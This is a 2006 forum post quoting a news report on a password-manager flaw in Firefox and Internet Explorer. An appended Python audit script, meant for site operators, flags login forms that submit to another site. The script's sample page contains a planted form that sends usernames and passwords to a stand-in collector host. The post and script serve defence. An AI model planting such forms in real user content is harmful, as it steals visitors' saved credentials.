infoseeker
November 26th, 2006, 12:16 AM
Frequent visitors to blogs and Internet forums may be particularly at risk of identity theft due to an exploit that prompts the Firefox and Internet Explorer password managers to give away their protected information. Both Mozilla and Microsoft have acknowledged the problem and are working on fixes.
A software security researcher has warned that the password manager features of Mozilla's open source Firefox 2.0 and Microsoft's (Nasdaq: MSFT) Internet Explorer (IE) Web browsers could be exploited, placing unsuspecting users at risk.
Users of Firefox or Explorer, both of which may be vulnerable to the attack known as "Reverse Cross Site Request" (RCSR), are not fooled directly by the password theft exploit. Instead, it provides a fake login site that fools a browser's saved password feature into automatically providing the information, Robert Chapin, president of Chapin Information Services, reported.
Neither the latest Firefox 2.0 nor Explorer 7 browser was designed to check the destination of form data before submission, thus making them vulnerable to the weakness.
Because the exploit is actually conducted at a trusted Web site, the user sees a trusted address in the browser bar, according to Chapin.
"Users of both Firefox and Internet Explorer need to be aware that their information can be stolen in this way when visiting blog and forum Web sites at trusted addresses," Chapin wrote for his security site Chapin Information Services (CIS).
http://www.technewsworld.com/story/QH9bSetNcAdCEL/Firefox-IE-Vulnerable-to-Password-Theft.xhtml
Do I say "Don't Remember My Password" and "Am I using Opera or other browser?"
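The destination check the article says the browsers lacked, written as a server-side audit a blog or forum operator could run over rendered pages. This is an added example, not code from the article or from Chapin's report. The function and class names are hypothetical, and the sample page and the hosts forum.example and collector.example are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

def origin(url):
    """(scheme, host, port) with the default port filled in."""
    p = urlsplit(url)
    return (p.scheme, (p.hostname or "").lower(),
            p.port or {"http": 80, "https": 443}.get(p.scheme))

class FormAudit(HTMLParser):
    """Record password forms whose submission target leaves the page's origin."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.targets = None       # resolved targets of the form being parsed
        self.has_password = False
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.end_form()       # tolerate an unclosed previous form
            self.targets = [urljoin(self.page_url, (a.get("action") or "").strip())]
            self.has_password = False
        elif tag in ("input", "button") and self.targets is not None:
            if (a.get("type") or "").lower() == "password":
                self.has_password = True
            if a.get("formaction"):   # per-button override of the form's action
                self.targets.append(urljoin(self.page_url, a["formaction"].strip()))

    def handle_endtag(self, tag):
        if tag == "form":
            self.end_form()

    def end_form(self):
        if self.targets and self.has_password:
            here = origin(self.page_url)
            self.findings += [t for t in self.targets if origin(t) != here]
        self.targets = None

def cross_origin_password_forms(page_url, html):
    """Return submission targets of password forms that point off-origin."""
    audit = FormAudit(page_url)
    audit.feed(html)
    audit.close()
    audit.end_form()
    return audit.findings

# Constructed sample: the site's own login form plus a form inside a user post.
SAMPLE_URL = "https://forum.example/thread/42"
SAMPLE_HTML = """
<form action="/login"><input name="u"><input type="password" name="p"></form>
<div class="post"><form action="https://collector.example/c">
<input name="u"><input type="password" name="p"></form></div>
<form action="//forum.example/search"><input name="q"></form>
"""
```

A non-empty result for a page that carries user-submitted content means the comment or post sanitizer is letting form markup through and should strip it.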